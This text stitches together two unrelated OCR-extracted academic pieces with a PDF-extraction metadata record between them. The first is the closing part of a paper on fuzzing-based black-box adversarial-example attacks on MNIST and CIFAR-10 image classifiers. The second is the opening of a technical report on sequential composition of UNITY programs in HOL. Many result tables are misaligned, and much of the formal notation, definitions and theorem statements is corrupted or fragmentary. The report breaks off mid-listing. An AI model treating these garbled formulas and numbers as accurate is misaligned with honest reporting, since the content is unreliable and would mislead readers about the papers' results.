attack\(^1\) as baselines, and use Boundary attack\(^2\) and Opt attack\(^3\) for comparison. We adopt the default parameters for the four attacks from their corresponding original implementations. As for fuzzing attacks, we use three different small LocalFuzzer levels including 100, 300, and 500. We report the average \(L_0\) and \(L_2\) distances between a successful adversarial example and a source image, and the average number of queries for successful adversarial examples generated from 100 attack attempts. \(L_0\) measures the number of different pixels between two images and \(L_2\) is the Euclidean distance. Using the default attack parameters in the corresponding implementations, Opt attack, C&W attacks, and our fuzzing attacks can achieve 100\% success rates while Boundary attack achieves between 90\% and 100\% success rates. Note that due to the randomness of our fuzzing attacks, the results could vary in a certain range from run to run.
**Untargeted Attacks** An untargeted attack is successful when an adversarial image is classified as any class other than the source class. Although the guidance images in untargeted attacks could be any randomly generated images or legitimate images classified as any class other than the source class, we use the same guidance images in the targeted attacks for consistency. Also, we found that there is not much difference between using a randomly generated guidance image and a legitimate image. The results for untargeted attacks are summarized in Table 1. While Boundary attack and Opt attack can generate successful adversarial examples with smaller \(L_2\) distance compared to C&W attacks, they tend to change most of the pixels in an image since their average \(L_0\) is higher. However, adversarial examples generated from our fuzzing attacks have larger \(L_2\) distance but smaller \(L_0\) distance. The results are comparable to C&W \(L_0\) attack. The first row in Figure 2 shows the successful adversarial examples from the untargeted fuzzing attacks on MNIST and CIFAR-10. The perturbations on CIFAR-10 are largely imperceptible by human eyes while they are more obvious on MNIST. This is mostly due to the uniform dark background of MNIST images \(^4\) especially when \(L_0\) is reduced and \(L_2\) is increased. What we want to highlight is that the average number of queries used by our fuzzing attacks is significantly decreased by 10-18 folds and 2-5 folds for MNIST and CIFAR-10, respectively.
### Table 1: Results for Untargeted Attacks
<table>
<thead>
<tr>
<th></th>
<th>MNIST</th>
<th>CIFAR-10</th>
</tr>
</thead>
<tbody>
<tr>
<td></td>
<td>(L_0)</td>
<td>(L_2)</td>
</tr>
<tr>
<td>Boundary attack</td>
<td>769</td>
<td>1.1454</td>
</tr>
<tr>
<td>Opt attack</td>
<td>784</td>
<td>1.0839</td>
</tr>
<tr>
<td>C&W (L_0) attack</td>
<td>10</td>
<td>2.5963</td>
</tr>
<tr>
<td>C&W (L_2) attack</td>
<td>749</td>
<td>1.4653</td>
</tr>
<tr>
<td>Fuzzing attack 100</td>
<td>19</td>
<td>2.5536</td>
</tr>
<tr>
<td>Fuzzing attack 300</td>
<td>19</td>
<td>2.5041</td>
</tr>
<tr>
<td>Fuzzing attack 500</td>
<td>19</td>
<td>2.4525</td>
</tr>
</tbody>
</table>
**Targeted Attacks** We consider next label targeted attacks \(^5\) where the adversarial goal is for an adversarial example to be misclassified as a target class \(y_t\) such that \(y_t = (y + 1)\) module 10 where \(y\) is the source class. The results for targeted attacks are shown in Table 2. The second row in Figure 2 shows the successful adversarial examples from the targeted fuzzing attacks on MNIST and CIFAR-10. The perturbations for targeted attacks are visually larger
---
\(^1\)https://github.com/carlini/nn_robust_attacks
\(^2\)https://github.com/bethgelab/foolbox
\(^3\)https://github.com/LeMinhThong/blackbox-attack
---
Figure 2: Successful adversarial examples from fuzzing attacks on MNIST and CIFAR-10
Table 2: Results for Targeted Attacks
<table>
<thead>
<tr>
<th></th>
<th>MNIST</th>
<th>CIFAR-10</th>
</tr>
</thead>
<tbody>
<tr>
<td></td>
<td>Avg $L_0$</td>
<td>Avg $L_2$</td>
</tr>
<tr>
<td>Boundary attack</td>
<td>773</td>
<td>1.8393</td>
</tr>
<tr>
<td>Opt attack</td>
<td>784</td>
<td>1.9040</td>
</tr>
<tr>
<td>C&W $L_0$ attack</td>
<td>26</td>
<td>3.6744</td>
</tr>
<tr>
<td>C&W $L_2$ attack</td>
<td>742</td>
<td>2.1752</td>
</tr>
<tr>
<td>Fuzzing attack 100</td>
<td>43</td>
<td>3.3925</td>
</tr>
<tr>
<td>Fuzzing attack 300</td>
<td>42</td>
<td>3.3553</td>
</tr>
<tr>
<td>Fuzzing attack 500</td>
<td>41</td>
<td>3.3690</td>
</tr>
</tbody>
</table>
than the perturbations for untargeted attacks. Similarly, the fuzzing attack decreases the average $L_0$ distance while increases the average $L_2$ distance. The fuzzing attacks also reduce the average number of queries by 8-9 folds and 2-2.5 folds for MNIST and CIFAR-10, respectively. Note that it is harder to find successful adversarial examples using LocalFuzzer levels of 300 and 500 on CIFAR-10 because of the larger feature space compared to MNIST and the smaller adversarial space in the targeted attacks compared to that of the untargeted attacks.
Overall, the randomness advantages of the fuzzing approach help to reduce the average number of queries and $L_0$ distance by sacrificing a small amount of $L_2$ distance. The experimental results show that fuzzing attacks are feasible and effective. However, they potentially can be further strengthened by improving the fuzzing process such as seed selection, main direction selection, step selection, mutation operation selection, etc.
4.2 RESULTS ON APPLYING LOCALFUZZER ON SUCCESSFUL ADVERSARIAL EXAMPLES
We now apply LocalFuzzer on successful adversarial examples generated from Boundary attack, Opt attack, and our fuzzing attacks to more intensively evaluate the bulk generation capability of LocalFuzzer. We leverage the successful adversarial examples from the experiments in Section 4.1 for both untargeted and targeted attacks. For fuzzing attacks, we use the adversarial examples generated with a LocalFuzzer level of 500 which are shown in the third row of fuzzing attacks in both Table 1 and Table 2. Three experiments with different LocalFuzzer levels of 100, 1,000, and 5,000 are performed.
We report six metrics including M1: success bulk generation rate (i.e., the percent of bulk runs returning successful examples); M2: average number of successful examples generated in a bulk run; M3: success bulk generation rate with lower $L_2$ (i.e., percent of success bulk runs returning adversarial examples with $L_2$ lower than that of the seed image); M4: average number of successful examples with lower $L_2$ in a bulk run; M5: average decreased $L_2$ of successful examples with lower $L_2$; M6: average $L_2$ decreasing rate of successful examples with lower $L_2$.
The results for untargeted attacks and targeted attacks are presented in Table 3 and Table 4, respectively. We achieve 100% success bulk generation rate across runs in all experiments, which indicates the great benefits of the bulk generation capability of LocalFuzzer. It is also demonstrated that the “optimized” adversarial examples from Boundary attack and Opt attack can further be refined. LocalFuzzer takes relatively a smaller number of queries (i.e., 100, 1,000, and 5,000 in the experiments) compared with what was taken originally in Boundary attack and Opt attack, but can immediately generate more successful adversarial examples even with smaller $L_2$ distance from the source example. These results indicate that LocalFuzzer itself can be an independent and useful tool to augment many adversarial example generation algorithms.
5 CONCLUSION AND DISCUSSION
Inspired by the similarities between attacking a machine learning model and testing the correctness or security bug of a program, we proposed fuzzing-based hard-label black-box attacks to generate adversarial examples. We designed two fuzzers, AdvFuzzer and LocalFuzzer, to explore multiple random paths between a source image and a guidance image, and the nearby space of each step
Table 3: Bulking successful examples from untargeted attacks
<table>
<thead>
<tr>
<th>Attack</th>
<th>M1</th>
<th>M2</th>
<th>M3</th>
<th>M4</th>
<th>M5</th>
<th>M6</th>
</tr>
</thead>
<tbody>
<tr>
<td>Boundary Attack</td>
<td>100%</td>
<td>63</td>
<td>66.00%</td>
<td>16</td>
<td>2.45e-3</td>
<td>0.23%</td>
</tr>
<tr>
<td>MNIST</td>
<td>100%</td>
<td>736</td>
<td>58.23%</td>
<td>56</td>
<td>4.93e-3</td>
<td>0.48%</td>
</tr>
<tr>
<td>Opt Attack</td>
<td>100%</td>
<td>3,888</td>
<td>73.00%</td>
<td>112</td>
<td>5.64e-3</td>
<td>0.56%</td>
</tr>
<tr>
<td>Fuzzing Attack</td>
<td>100%</td>
<td>92</td>
<td>67.00%</td>
<td>7</td>
<td>1.97e-2</td>
<td>0.90%</td>
</tr>
<tr>
<td></td>
<td>100%</td>
<td>939</td>
<td>100%</td>
<td>75</td>
<td>3.99e-2</td>
<td>1.81%</td>
</tr>
<tr>
<td></td>
<td>100%</td>
<td>4,730</td>
<td>100%</td>
<td>425</td>
<td>3.99e-2</td>
<td>1.81%</td>
</tr>
</tbody>
</table>
Table 4: Bulking successful examples from targeted attacks
<table>
<thead>
<tr>
<th>Attack</th>
<th>M1</th>
<th>M2</th>
<th>M3</th>
<th>M4</th>
<th>M5</th>
<th>M6</th>
</tr>
</thead>
<tbody>
<tr>
<td>Boundary Attack</td>
<td>100%</td>
<td>57</td>
<td>3.26%</td>
<td>3</td>
<td>0.14e-3</td>
<td>0.07%</td>
</tr>
<tr>
<td>MNIST</td>
<td>100%</td>
<td>676</td>
<td>6.52%</td>
<td>4</td>
<td>0.17e-3</td>
<td>0.07%</td>
</tr>
<tr>
<td>Opt Attack</td>
<td>100%</td>
<td>3,726</td>
<td>9.78%</td>
<td>8</td>
<td>0.29e-3</td>
<td>0.10%</td>
</tr>
<tr>
<td>Fuzzing Attack</td>
<td>100%</td>
<td>69</td>
<td>2.00%</td>
<td>2</td>
<td>0.15e-3</td>
<td>0.04%</td>
</tr>
<tr>
<td></td>
<td>100%</td>
<td>757</td>
<td>7.00%</td>
<td>3</td>
<td>0.18e-3</td>
<td>0.06%</td>
</tr>
<tr>
<td></td>
<td>100%</td>
<td>3,936</td>
<td>10.00%</td>
<td>4</td>
<td>0.12e-3</td>
<td>0.04%</td>
</tr>
<tr>
<td></td>
<td>100%</td>
<td>93</td>
<td>24.21%</td>
<td>8</td>
<td>6.34e-3</td>
<td>0.42%</td>
</tr>
<tr>
<td></td>
<td>100%</td>
<td>943</td>
<td>58.95%</td>
<td>54</td>
<td>8.93e-3</td>
<td>0.56%</td>
</tr>
<tr>
<td></td>
<td>100%</td>
<td>4,774</td>
<td>80.00%</td>
<td>258</td>
<td>3.99e-2</td>
<td>1.81%</td>
</tr>
</tbody>
</table>
along the way. We evaluated our fuzzing attacks using MNIST and CIFAR-10 datasets, and compared ours with four existing attacks including Boundary attack, Opt attack, and C&W $L_0$ and $L_2$ attacks. The experimental results demonstrated that our fuzzing attacks are feasible and effective. Moreover, LocalFuzzer has the bulk successful example generation capability and distance refinement capability on adversarial examples generated from different attack methods. We would recommend LocalFuzzer as an independent and useful tool for augmenting many adversarial example generation algorithms.
Our work provides evidence on adopting fuzz testing in the adversarial example generation domain. Although the randomness advantage of the fuzzing attacks could help reduce the number of model queries, one limitation of our attacks is that they sacrifice the $L_2$ distance to a small extent. We expect that further improvement of the fuzzing process could be explored to construct more powerful
fuzzing-based attacks. For example, potential ways for improvement could be a better guidance strategy in the main direction selection, a refined seed selection process, a refined mutation function, etc. We are working on improving our approach and we hope our fuzzing attacks could inspire more related research in the future.
REFERENCES
Yann LeCun and Corinna Cortes. MNIST handwritten digit database. 2010.
|
{"Source-Url": "https://openreview.net/pdf?id=BklYhxBYwH", "len_cl100k_base": 8339, "olmocr-version": "0.1.50", "pdf-total-pages": 10, "total-fallback-pages": 0, "total-input-tokens": 31978, "total-output-tokens": 10706, "length": "2e13", "weborganizer": {"__label__adult": 0.0006418228149414062, "__label__art_design": 0.0008907318115234375, "__label__crime_law": 0.0011816024780273438, "__label__education_jobs": 0.0011873245239257812, "__label__entertainment": 0.00019979476928710935, "__label__fashion_beauty": 0.0003509521484375, "__label__finance_business": 0.0005555152893066406, "__label__food_dining": 0.0005526542663574219, "__label__games": 0.0017414093017578125, "__label__hardware": 0.0015783309936523438, "__label__health": 0.0013971328735351562, "__label__history": 0.0004286766052246094, "__label__home_hobbies": 0.00016129016876220703, "__label__industrial": 0.000797271728515625, "__label__literature": 0.0005950927734375, "__label__politics": 0.0005602836608886719, "__label__religion": 0.0006618499755859375, "__label__science_tech": 0.33056640625, "__label__social_life": 0.0001614093780517578, "__label__software": 0.0152130126953125, "__label__software_dev": 0.6396484375, "__label__sports_fitness": 0.0004420280456542969, "__label__transportation": 0.0005698204040527344, "__label__travel": 0.00022852420806884768}, "weborganizer_max": "__label__software_dev", "avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_ratio": [[0, 37360, 0.06617]], "fineweb_edu_fasttext_gt2__fineweb_edu_fasttext_gt2__score": [[0, 37360, 0.37084]], "ft_lang_id_en_doc_v2__ft_lang_id_en_doc_v2__en": [[0, 37360, 0.87438]], "google_gemma-3-12b-it_contains_pii": [[0, 3845, false], [3845, 8928, null], [8928, 13105, null], [13105, 17504, null], [17504, 20940, null], [20940, 25100, null], [25100, 29511, null], [29511, 32001, null], [32001, 35433, null], [35433, 37360, null]], "google_gemma-3-12b-it_is_public_document": [[0, 3845, true], [3845, 8928, null], [8928, 13105, null], [13105, 17504, null], [17504, 20940, null], [20940, 25100, null], [25100, 29511, null], [29511, 32001, null], [32001, 35433, null], [35433, 37360, null]], "google_gemma-3-4b-it_v2tag__is_academic_paper": [[0, 5000, true], [5000, 37360, null]], "google_gemma-3-4b-it_v2tag__is_class_syllabus": [[0, 5000, false], [5000, 37360, null]], "google_gemma-3-4b-it_v2tag__is_completion_certificate": [[0, 5000, false], [5000, 37360, null]], "google_gemma-3-4b-it_v2tag__is_court_notice": [[0, 5000, false], [5000, 37360, null]], "google_gemma-3-4b-it_v2tag__is_homework_assignment": [[0, 5000, false], [5000, 37360, null]], "google_gemma-3-4b-it_v2tag__is_news_article": [[0, 5000, false], [5000, 37360, null]], "google_gemma-3-4b-it_v2tag__is_public_order": [[0, 5000, false], [5000, 37360, null]], "google_gemma-3-4b-it_v2tag__is_resume_cv": [[0, 5000, false], [5000, 37360, null]], "google_gemma-3-4b-it_v2tag__is_test_or_quiz": [[0, 5000, false], [5000, 37360, null]], "google_gemma-3-4b-it_v2tag__is_textbook": [[0, 5000, false], [5000, 37360, null]], "pdf_page_numbers": [[0, 3845, 1], [3845, 8928, 2], [8928, 13105, 3], [13105, 17504, 4], [17504, 20940, 5], [20940, 25100, 6], [25100, 29511, 7], [29511, 32001, 8], [32001, 35433, 9], [35433, 37360, 10]], "pipe_delimited_lines_v1__pipe_delimited_lines_v1__pipe_delimited_lines_ratio": [[0, 37360, 0.22807]]}
|
olmocr_science_pdfs
|
2024-11-30
|
2024-11-30
|
e24b5eaff1fcaee0e091afc636f04204ad969cbe
|
Sequential program composition in UNITY
Tanja Vos and Doaitse Swierstra
Utrecht University, Department of Computer science
e-mail: \{tanja, doaitse\}@cs.uu.nl
February 28, 2000
1 Introduction
Large distributed applications are composed of basic blocks, by using composition operators. In an ideal situation, one should be able to develop and verify each of these basic components by itself, using compositionality theorems of the respective composition operators stating that properties of a composite program can be proved by proving properties of its components.
Generally, two forms of distributed program composition can be distinguished: parallel composition and sequential composition. Parallel composition is standard in UNITY [CM89], and is used when two distributed component-programs need to cooperate in one way or another. Compositionality theorems of parallel composition on general progress properties are extensively studied in [CM89, Sin89a, Pra95]. Sequential composition of UNITY programs is not part of core UNITY [CM89]. It can however be very useful when we want a program to work with the results of another program. For example, for the Propogation of Information with Feedback (PIF) protocol [Seg83]:
elect a leader \(\triangleright\) let the leader be the starter of the PIF protocol
In [Mis90b], a brief and intuitive characterisation of sequential composition is given. In this technical report, we shall formally define and model sequential program composition within the HOL-UNITY embedding described in [Pra95, Vos00] In order to do so, we introduce a new type of UNITY programs called $\text{UNITY}^+$ programs which consist of sequentially composed UNITY programs. The semantics of a $\text{UNITY}^+$ programs is then defined in terms of a UNITY program that models the desired behaviour of the sequential composition. Finally, safety and progress operators are defined for these $\text{UNITY}^+$ programs, and compositionality theorems are derived. For those readers not familiar with UNITY and its embedding in HOL, Appendix A contains a brief overview of it. For those readers that are familiar with UNITY, we have compiled an extensive index that should enable the reader to start reading this technical report, looking up desired definitions in a demand-driven way.
2 Semantics of sequential program composition
In [Mis90b], sequential composition of programs $P \triangleright Q$ is defined intuitively in operational terms as follows. Program $P$’s execution is started. If a fixed-point state of $P$ is reached, the execution of $Q$ is started from that state. In this technical report, we generalise this by parametrising $\triangleright$ with some state-predicate, and interpreting $P \triangleright_r Q$ as follows. Program $P$’s execution is started. If a predicate $r$ holds in some state during the execution of $P$, the execution of $Q$ is started from that state. Consequently, if $r$ is a fixed-point of $P$ (i.e. $\mu^+ \text{FP},r$), then our operational intuition of $\triangleright$ corresponds to that of [Mis90b].
In order to formalise the $\triangleright_r$-operator, we have to find a way to enforce that:
- the execution of $P$ is stopped when $r$ holds
• the execution of $Q$ is started in exactly that state where $r$ started to hold in $P$
In [Mis90b], $r$ is assumed to be a fixed-point of $P$, and, as a consequence, if $r$ holds, then the execution of $P$ has effectively stopped. Moreover, in [Mis90b] it is implicitly assumed that the execution of a UNITY program is started only when its initial condition is satisfied, and since only those programs $Q$ that have $P$’s fixed-point as their initial condition are considered it is ensured that once $P$ stops, $Q$ can start executing. In our case, however, it is not as simple as this. First, we decided to generalise our $\triangleright$ operator by parametrising it with some state-predicate which is not necessarily $P$’s fixed-point. Second, in our HOL-UNITY embedding, where a program’s progress properties are proved independently from its initial condition [Pra95], we cannot use this approach from [Mis90b] to ensure that $Q$ is started in exactly that state where $r$ started to hold in $P$. Consequently, we have to deal with these two aspects explicitly when formally defining the semantics of our $\triangleright$ operator. In order to explain the approach we have taken, we use the two UNITY programs $P$ and $Q$ from below.
<table>
<thead>
<tr>
<th>prog $P$</th>
<th>prog $Q$</th>
</tr>
</thead>
<tbody>
<tr>
<td>read ${x}$</td>
<td>read ${x}$</td>
</tr>
<tr>
<td>write ${x}$</td>
<td>write ${y}$</td>
</tr>
<tr>
<td>init $x = 0$</td>
<td>init true</td>
</tr>
<tr>
<td>assign if $x \geq 0$ then $x := x + 1$</td>
<td>assign $y := x$</td>
</tr>
</tbody>
</table>
Obviously, we need to define the semantics of $P \triangleright_r Q$, such that:
• as soon as predicate $r$ holds, all guards of $P$ its actions are disabled and remain disabled forever (i.e. we transform $P$ such that $r$ becomes a fixed-point of the transformation).
• when $r$ is not yet satisfied during the execution of $P$, all guards of $Q$ are disabled, and as soon as $r$ becomes true the guards of $Q$’s actions are enabled as far as this is allowed by $Q$ itself.
In order to achieve this, we introduce a fresh variable $pc$, the value of which indicates which program (i.e. $P$ or $Q$) is allowed to execute. We make sure that once $r$ becomes true the value of the $pc$ is adjusted as to ensure that the execution of $P$ is stopped and that of $Q$ is started. Subsequently, we transform $P$ and $Q$ by strengthening the guards of all their actions such that these are only enabled when the value of the $pc$ allows them. Moreover, we strengthen the guards of all actions in the programs $P$ with $\neg r$ such that these actions immediately become disabled when $r$ becomes true (i.e. $r$ becomes a fixed-point). Finally, we compose these transformations using parallel composition. For programs $P$ and $Q$, this results in the following semantics of $P \triangleright_r Q$:
| prog $P \triangleright_r Q$ |
| read $\{x\}$ |
| write $\{x, y\}$ |
| init $(x = 0) \land (pc = 0)$ |
| assign if $(x \geq 0) \land (pc = 0) \land \neg r$ then $x := x + 1$ |
| [] if $(pc = 0) \land r$ then $pc := pc + 1$ |
| [] if $(pc = 1)$ then $y := x$ |
This evidently gives the desired effect. If $r$ becomes true, the guard of $P$’s action is immediately disabled since it contains $(\neg r)$. Eventually the $pc$ will be incremented and become 1. As a result, $Q$ can start executing, and since the $pc$ will never change again $P$ has stopped.
Now, we have laid the foundations of how we will define the semantics of $\triangleright_r$. Subsequently, we have to determine how we handle sequences of sequential compositions:
$P \triangleright_r Q \triangleright_s H$
A property following naturally from the intuitive interpretation of sequential composition, is that of associativity. Consequently, we want to define the semantics of $\triangleright_r$ such that:
$$P \triangleright_r Q \triangleright_s H = (P \triangleright_r Q) \triangleright_s H = P \triangleright_r (Q \triangleright_s H)$$
From the discussion above, we can derive that the following program captures the intended meaning of these sequences:
$$\begin{align*}
\text{prog} & \quad P \triangleright_r Q \triangleright_s H \\
\text{read} & \quad rP \cup rQ \cup rH \\
\text{write} & \quad wP \cup wQ \cup wH \\
\text{init} & \quad \text{ini}P \land \text{ini}Q \land \text{ini}H \land (pc = 0) \\
\text{assign if} & \quad (pc = 0) \land \lnot r \text{ then } P \\
& \quad \quad \text{if } (pc = 0) \land r \text{ then } pc := pc + 1 \\
& \quad \quad \text{if } (pc = 1) \land \lnot s \text{ then } Q \\
& \quad \quad \text{if } (pc = 1) \land s \text{ then } pc := pc + 1 \\
& \quad \quad \text{if } (pc = 2) \text{ then } H
\end{align*}$$
When defining the semantics of $\triangleright_r$ such that the latter is associative, we need to make sure that it is defined in such a way that the semantics of $(P \triangleright_r Q) \triangleright_s H$ as well as $P \triangleright_r (Q \triangleright_s H)$ are equal to the program presented above. Consequently, since we allow sequential composition of any (finite) number of programs, a shallow embedding of $\triangleright$ is inadequate to ensure that the right values of $pc$ are used when strengthening the guards. Therefore, we define the $\triangleright$ operator using a deep embedding\(^1\). Since, a sequence of sequential compositions consists of “simple” UNITY programs (i.e. those of type $\text{Uprog}$ (see page 10)), composed with the $\triangleright$ operator, we define the abstract syntax of $\text{UNITY}^+$ programs by the following recursive data type:
\[\text{Definition 2.1 Type definition} \]
\[\text{UNITY}^+ = \text{Simple.Uprog} \mid \text{Uprog}^+ \triangleright \text{Expr} \mid \text{Uprog}^+\]
Now we can define the semantics and other properties of sequential composition as recursive functions over this data type. For example, the write variables of a $\text{UNITY}^+$ program can be obtained as follows (we overload the $w$ destructor from Appendix A.2):
\(^1\)In a deep embedding, the abstract syntax of the language is defined as a type in the HOL logic, and the semantics is defined as recursive functions over this type.
Definition 2.2 Write variables of a UNITY+ program
\[
\begin{align*}
\text{w}( ext{Simple}.P) &= \text{w}P \\
\text{w}(P+ \fatsemi r Q^+) &= \text{w}P^+ \cup \text{w}Q^+
\end{align*}
\]
Continuing with the semantics, suppose we need to define the semantics of \(P+ \fatsemi r Q^+\), where \(P^+\) and \(Q^+\) can consist of arbitrary sequential compositions. The first value of the \(\text{pc}\) used in the semantics of \(Q^+\) has to be the successor of the maximal \(\text{pc}\) used in the semantics of \(P^+\). Moreover, only the guard of the last “simple” UNITY program in \(P^+\)’s sequence has to be strengthened with the negation of the state-predicate \(r\). In order to achieve this we define a transformation function \(\text{tr}\) that given an arbitrary Unity program \(U\), and some start value \(n\) for the \(\text{pc}\) (i.e. if the \(\text{pc}\) is \(n\), then the first Simple UNITY program in the sequence \(U^+\) is allowed to execute) returns a tuple like:
\[
(U \in \text{Expr}_-\text{Unity}, m \in \text{num})
\]
such that given a state-predicate \(r\), \(U.r\) will execute until \(r\) holds and when \(r\) holds the value of the \(\text{pc}\) will be \(m\). Note that, \(U.r\) denotes the semantics of \(U^+\). Inspecting the examples given earlier, when \(U^+\) is a simple UNITY program \(P\), this transformation shall return:
\[
((\lambda r. \text{if } \text{pc} = n \land \neg r \text{ then } P \| \text{if } (\text{pc} = n) \land r \text{ then } \text{pc} := \text{pc} + 1)\), n + 1)\]
Now, suppose that \(U^+\) is a composite Unity program \(P^+ \fatsemi r Q^+\). If transforming \(P^+\) with \(n\) as the start value of \(\text{pc}\) results in \((P, m)\), we can transform \(Q^+\) with \(m\) as the start value of \(\text{pc}\) since then we know that the first value of the \(\text{pc}\) used in the semantics of \(Q^+\) is the successor of the maximal \(\text{pc}\) used in the semantics of \(P^+\). If this transformation results in \((Q, k)\), then we can ensure that only the guard of the last “simple” UNITY program in \(P^+\)’s sequence is strengthened with the negation of the state-predicate \(r\), by defining the transformation of \(P^+ \fatsemi r Q^+\) with \(n\) as the start value of \(\text{pc}\) to result in:
\[
((\lambda q. (P.r \| Q.q)), k)
\]
The formal definition of this transformation function is stated below. We use restricted union superposition (Definition A.21) to transform Simple UNITY+ programs.
Definition 2.3
\[
\begin{align*}
\text{tr.}(\text{Simple}.P).\text{pc}.n &= ((\lambda r. \text{RU}.S.\text{(strengthen guards}.(\text{pc} = n \land \neg r).P) \\
&.\text{if } (\text{pc} = n) \land r \text{ then } \text{pc} := \text{pc} + 1) \\
&.\text{true}) \\
&, n + 1)
\end{align*}
\]
\[
\text{tr.}(P^+ \fatsemi r Q^+).\text{pc}.n = \text{let } (P, m) = \text{tr}.P^+.\text{pc}.n \land (Q, k) = \text{tr}.Q^+.\text{pc}.m \\
\text{in } ((\lambda q. P.r \| Q.q), k)
\]
Now the semantics of a UNITY+ program is defined by the following function:
Definition 2.4
\[
\text{semantics}U^+.\text{pc}.n.q = \text{add_to_initial_cond}.(\text{pc} = n).\text{(FST}.(\text{tr}.U^+.\text{pc}.n.q))
\]
where \( n \) is the start value of the \( \text{pc} \), and \( q \) is a state-predicate indicating when the last simple program in the composition is allowed to stop executing (i.e. its exit condition). If \( q \) is false, this indicates that the actions of the last simple UNITY program in a sequential composition may be enabled indefinitely and that the \( \text{pc} \) will not be incremented anymore. Note that using this definition, the semantics of \( P + \seqt r Q + \seqt s H \) is slightly different from that presented on page 3 (at the ☼). More specific, \( \text{semantics}.(P + \seqt r Q + \seqt s H).\text{pc}.0.\text{false} \) results in the UNITY program depicted in Figure 2. However, it is easily recognised that the semantics are the same, since \( \text{true} \) is the identity element of \( \land \), and the last action will always be a skip action because \( \text{false} \) is never satisfied.
Proving that \( \seqt r \) is associative is now straightforward, since \((\seqt r)\) is associative:
\[ \text{Theorem 2.5 Associativity of } \seqt r \]
For arbitrary UNITY\(^+\) programs \( P +, Q +, \) and \( H +, \) and state-predicates \( r, s \in \text{Expr} \):
\[ \text{semantics}.((P + \seqt r Q +) \seqt s H +) = \text{semantics}.(P + \seqt r (Q + \seqt s H +)) \]
Consequently, the function \( \text{semantics}.U +.\text{pc} \) only defines the desired semantics for \( U +, \) when \( \{\text{pc}\} \notin U +. \)
We end this section by stating some properties of the semantics of \( \seqt r \). The maximal value the \( \text{pc} \) can reach in the program \( \text{semantics}.U +.\text{pc}.n.q \) is defined by:
\[ \text{Definition 2.7} \]
\[ \text{max}_{\text{pc}}U +.\text{pc}.n = \text{SND}.(\text{tr}.U +.\text{pc}.n) \]
From the definition of $\text{tr}$ (2.34), it is straightforward to deduce:
**Theorem 2.8**
$\forall U^\prime \ pc \ n :: n < (\text{max}_\text{pc} U^\prime . \text{pc} . n)$
When the value of the $\text{pc}$ is less that $n$, or greater than or equal to $\text{max}_\text{pc} U^\prime . \text{pc} . n$, all actions in the program $\text{semantics}.U^\prime . \text{pc} . n . q$ (for arbitrary $q$) are disabled. Consequently, these are fixed-points of this program:
**Theorem 2.9**
$\forall U^\prime \ pc \ n q :: U = \text{semantics}.U^\prime . \text{pc} . n . q \land \{ \text{pc} \} \not\vdash U^\prime \land (v \vdash (q \land \text{fp}((\text{pc} < n))) \land (v \vdash \text{fp}((\text{pc} \geq (\text{max}_\text{pc} U^\prime . \text{pc} . n)))))$
The value of the $\text{pc}$ shall never decrease during the execution of $\text{semantics}.U^\prime . \text{pc} . n . q$ (for arbitrary $q$), so:
**Theorem 2.10**
$\forall U^\prime \ pc \ n q :: U = \text{semantics}.U^\prime . \text{pc} . n . q \land \{ \text{pc} \} \not\vdash U^\prime \land (v \vdash \diamond (\text{pc} > n))$
Finally, during the execution of $\text{semantics}.U^\prime . \text{pc} . n . q$ (for arbitrary $q$), the value of the $\text{pc}$ will be less than $\text{max}_\text{pc} U^\prime . \text{pc} . n$ until $q$ holds and the $\text{pc}$ is incremented such that it gets its maximum value:
**Theorem 2.11**
$\forall U^\prime \ pc \ n q :: U = \text{semantics}.U^\prime . \text{pc} . n . q \land \{ \text{pc} \} \not\vdash U^\prime \land q \not\subseteq (\text{pc}) \land (v \vdash (\text{pc} < \text{max}_\text{pc} U^\prime . \text{pc} . n))$ unless $(\text{pc} = \text{max}_\text{pc} U^\prime . \text{pc} . n) \land q$
### 3 Proving properties of program sequencing
When working with $\text{UNITY}^+$ programs, the semantics underlying the $\diamond$ operator should be hidden, and the user should be able to prove properties of sequentially composed programs by proving properties of their component programs. In order to establish this, we first define safety and progress operators for $\text{UNITY}^+$ programs in terms of the standard safety and progress operators for $\text{UNITY}$ programs. Subsequently we derive theorems that state how safety and progress properties of $\text{UNITY}^+$ programs can be proved by reducing them to standard $\text{UNITY}$ properties of the component programs.
To express safety properties of $\text{UNITY}^+$ programs, we introduce two operators $\text{unless}^+$ and $\bigcirc^+$. Since, the semantics of a $\text{UNITY}^+$ program requires a state-predicate that indicates the
Theorem 3.3
\[\frac{\nu \vdash p \text{ unless } q \land \forall pc : \{ pc \} \not\subset (\text{Simple}.P) : p \subseteq C}{\forall r : \text{Simple}.P \vdash p \text{ unless}_r^+ q}\]
Theorem 3.4
\[\frac{qC \wedge \nu \vdash q \land \nu \vdash p \text{ unless}_q^+ r \land \nu \vdash p \text{ unless}_r^+ r}{J p \subseteq_{\text{Simple}.P} \nu \vdash p \text{ unless}_r^+ r}\]
Figure 3: Proving safety for UNITY\(^+\) programs
Definition 3.1
\[\nu \vdash p \text{ unless}_q^+ q = \forall n U : \{ pc \} \not\subset U \land U = \text{semantics}.U \vdash p \text{ unless}_q^+ q\]
Definition 3.2
\[\nu \vdash \circ J^+_r = \forall n U : \{ pc \} \not\subset U \land U = \text{semantics}.U \vdash \circ J^+_r\]
Compositionality theorems of unless\(^+\) are stated in Figure 3\(\tau\). Similar properties hold for the \(\circ^+\) operator.
To express progress properties of UNITY\(^+\) programs, we introduce two operators \(\Rightarrow^+\) and \(\Rightarrow^\circ\). Again, intuitively for a UNITY\(^+\) program \(U^+\): \(\nu \vdash p \text{ unless}_q^+ q\) shall imply that, during the execution of the semantics of \(U^+\), when \(p\) holds then eventually \(q\) holds. However, we have to be more specific about what we mean here. Consider again the following sequential composition:
\[U^+ = P \Rightarrow^+_r Q \Rightarrow^\circ J^+_s H\]
Suppose, we are at a specific point in the execution of the semantics of \(U^+\) where the \(pc\) is such that it is \(P\)’s turn to execute and \(p\) holds. Now, do we want \(J \nu \vdash p \Rightarrow^+ q\) to be valid if, from this specific point eventually \(q\) holds in \(P\) while actions of \(Q\) and \(H\) have not yet been executed? In order to answer this question, we have to consider what we are aiming at. As previously indicated, we want to derive theorems stating how progress properties of UNITY\(^+\) programs can be proved by reducing them to standard UNITY properties of the component programs. More specific, for the case of \(U^+\) above, these theorems shall state something like:
\[J p \Rightarrow^+_r s \land J s \Rightarrow^+_r r\]
Suppose we know that:
\[ J \downarrow (x = 10) \vdash something\ beautiful \]
Let \( P \), and \( Q \) be the following programs:
\[
\begin{align*}
\text{prog } P & \quad \text{prog } Q \\
\text{read } \emptyset & \quad \text{read } \emptyset \\
\text{write } \{x\} & \quad \text{write } \{x\} \\
